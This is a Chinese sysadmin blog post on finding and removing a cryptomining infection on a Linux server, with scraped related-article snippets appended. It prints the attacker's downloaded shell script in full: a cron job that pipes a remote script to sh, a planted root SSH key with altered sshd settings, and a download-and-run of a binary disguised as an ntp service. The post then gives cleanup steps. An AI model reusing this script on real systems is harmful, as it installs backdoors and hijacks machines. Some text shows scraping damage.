被黑客种下恶意程序进行挖矿的排除案例

被黑客种下恶意程序进行挖矿的排除案例

 

在查询一个redis一个rbd文件没有在指定文件目录下进行保存时发现crontab上有个定时脚本,才发现被攻击放马了

#crontab -l

*/10 ** * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

minerd是什么

minerd是挖矿程序,黑客入侵后,会利用宿主cpu进行复杂计算,强占cpu资源,使cpu使用率高达100%

下载脚本:

cat  pm.sh

exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"> /var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

echo"*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh"> /var/spool/cron/crontabs/root

if [ !-f "/root/.ssh/KHK75NEOiq" ]; then

mkdir -p ~/.ssh

rm -f ~/.ssh/authorized_keys*

echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot" > ~/.ssh/KHK75NEOiq

echo "PermitRootLogin yes">> /etc/ssh/sshd_config

echo "RSAAuthentication yes">> /etc/ssh/sshd_config

echo "PubkeyAuthentication yes">> /etc/ssh/sshd_config

echo "AuthorizedKeysFile.ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

/etc/init.d/sshd restart

fi

if [ !-f "/etc/init.d/ntp" ]; then

if [ ! -f"/etc/systemd/system/ntp.service" ]; then

mkdir -p /opt

curl -fsSLhttp://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 &&chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install

fi

fi

/etc/init.d/ntpstart

psauxf|grep -v grep|grep "/usr/bin/cron"|awk ‘{print $2}‘|xargs kill -9

psauxf|grep -v grep|grep "/opt/cron"|awk ‘{print $2}‘|xargs kill -9

根据以上脚本内容删除对应的程序文件及进程

需要处理以下文件及进程

1、crontab上的命令删除掉

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/root

mkdir-p /var/spool/cron/crontabs

"*/10* * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" >/var/spool/cron/crontabs/root

2、去掉ssh/authorized_keys

~/.ssh/KHK75NEOiq

被替换的/etc/ssh/sshd_config拿其他服务器上的替换掉。替换后重启sshd,记得更改root相关密码,防止黑客登陆。

3、删除相关管理的黑客程序启动文件,伪进程/etc/init.d/ntp删除并kill掉它启动的进程;

4、/usr/local/etc/minerd.conf里的minerd启动配置删除或者直接删除/usr/local/etc/minerd.conf

最后top看看有没有minerd及ntp进程

没大工高成。

参照:http://www.mamicode.com/info-detail-1443821.html

时间: 2024-08-27 18:35:55

被黑客种下恶意程序进行挖矿的排除案例的相关文章

被黑客种下恶意程序的排除案例

top -c 查到cpu的占用率最高的进程 Tasks: 161 total, 2 running, 157 sleeping, 0 stopped, 2 zombie Cpu(s): 98.2%us, 1.8%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 3921112k total, 2629276k used, 1291836k free, 48604k buffers Swap: 0k total, 0k used, 0k

隐藏在图片下的恶意程序Stegoloader,是否避开了你的杀软?

Stegoloader也叫Win32/Gatak.DR 及TSPY_GATAK.GTK,它是一款首次于2013年被发现的恶意程序,但当时并未引起人们的注意,主要是以为它的设计很隐秘,因此很多反病毒解决方案并不能检测得到.信息隐藏技术是用来在另一信息或者图像文件中隐藏信息的一种技术.恶意程序作者利用它在图像文件中隐藏执行代码,在一系列的安全检测实施完之后,他才会被提取出来并运行.这种隐藏技术还被其他的一些恶意程序家族利用,如Miniduke APT组织.Aulreon木马.Lurk下载器. 在St

病毒木马查杀实战第026篇:“白加黑”恶意程序研究(上)

前言 众所周知,传统的恶意程序都是由单一文件构成的,从而实现某一种或者几种恶意功能.而这类的恶意程序为了避免被发现以及被查杀,往往会采用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者很多时候也是脑洞大开,为了对抗杀软的查杀也是无所不用其极.我们每天所处理的恶意文件里面,反查杀手段运用得最好的就是脚本木马,关于这类程序,我在之前的<病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御>这篇博文中也做过简单的论述.可是,不论恶意程序如何进化,杀软厂商总有各种各样的方法来应对现有的以及未知

现代恶意程序运作浅探及思考

有不少人为"黑客"一词辩护,认为其所指乃是一群"技术狂人"而已,"黑客"分享工具,而脚本小子使用工具干坏事.随着越来越多恶意程序从技术展示转变为明确的Stealing.这让我感觉"黑客"群体并不比世俗社会更纯洁.当越来越多具有较低受教育水平的人加入其中.目的或许只剩下如何快速地赚钱. 速成时代 前段时间一个木马制作者被曝光了出来.他在三年前还在计算机论坛问一些很基础的计算机问题.而今他已经是一名拥有几十万肉鸡的"红人

你是哪种层次的程序员?程序员的四种类型

http://www.nowamagic.net/librarys/news/detail/1370不是每一个写代码的都是程序员.这里,我把程序员定义为以编程为生的人.我认为世界上存在四类程序员:科学家.码农.专家和工匠.下面我一一介绍自己的观点. 科学家,与其说他们是程序员,不如说他们是数学家.他们发明了各种理论.算法和术语,教科书上那冗长的证明和计算也出自他们之手,其他的程序员都或多或少受益于他们的成果.有时,他们的一篇论文能改变整个业界的思维方式,但他们通常不会也不喜欢把那惊世骇俗的理论商

恶意程序新趋势-钻粪坑+数签

最近看到一些有趣的样本.跟大家聊聊其中一个名为"XX下载防踢补丁"的恶意程序.它使用了一些特殊却极为有效策略.使自己可以长期逃脱杀软的检查.其中暴露出来的问题或许更值得我们每一个安全界人士的思考. 感染流程及其行为如下: 首先其以XX下载功能插件的名义使用户开心去下载并替换XX下载原dll. 用户放置后发现果然有效果.(真干活,达到用户期望) 加了数字签名. 效果是: 用户是有意识要这样做的.并且完成了用户要完成的功能. 依赖于下载工具.不通过启动项启动.降低了杀软被查阅的可能性 而且

每天新增恶意程序2000加,移动互联网呼唤安全屏障

正在手机上使用微信支付的童鞋,一定要小心了!一个和微信长得一模一样的恶意程序或许正在窃取你的银行账户信息,并拦截银行发给你的短信.而这类影响数亿用户安全的恶意程序正在以每天超过2000个的速度增加,移动互联网安全正成为网络安全的新难题. 移动互联网上半年新增36.7万恶意程序 "非常危险.危机四伏"--在近日举行的2014中国互联网大会上,国家互联网应急中心何能强用这八个字来形容我国移动互联网安全现状. 根据国家互联网应急中心的监测,今年上半年,新增的移动互联网恶意程序超过了36.7万

【阿里云新人赛】恶意程序检测-项目实践总结

1. 比赛信息 比赛地址:阿里云恶意程序检测新人赛 比赛介绍:使用自然语言处理的方法对恶意程序的行为(API调用序列)进行分析,实现对恶意程序鉴别及分类. 2. 我的主要工作 1)数据预处理:格式转换csv->txt->pkl,根据fileid分组数据,排序后生成api序列,用于训练: 2)数据分析及可视化:主要是数据分布分析,包括恶意程序类别分布分析.调用api的类别及频率分析,训练集与测试集分布差异分析(计算交叉熵)等, 得出结论:此任务训练集与测试集分布差异不大,恶意程序类型更多是与ap

Rootkit Hunter恶意程序查杀

恶意程序,恶意代码检测,主要用来检测常规后门程序 下载:https://pkgs.org/search/rkhunter 安装:rpm -ivh rkunter* Installed: #需要先安装  lsof.x86_64 0:4.82-4.el6             mailx.x86_64 0:12.4-7.el6 检测系统: rkhunter -h  #查看参数 -c   #检测系统 --sk #跳过键盘输入 exp: rkhunter -c --sk [[email protect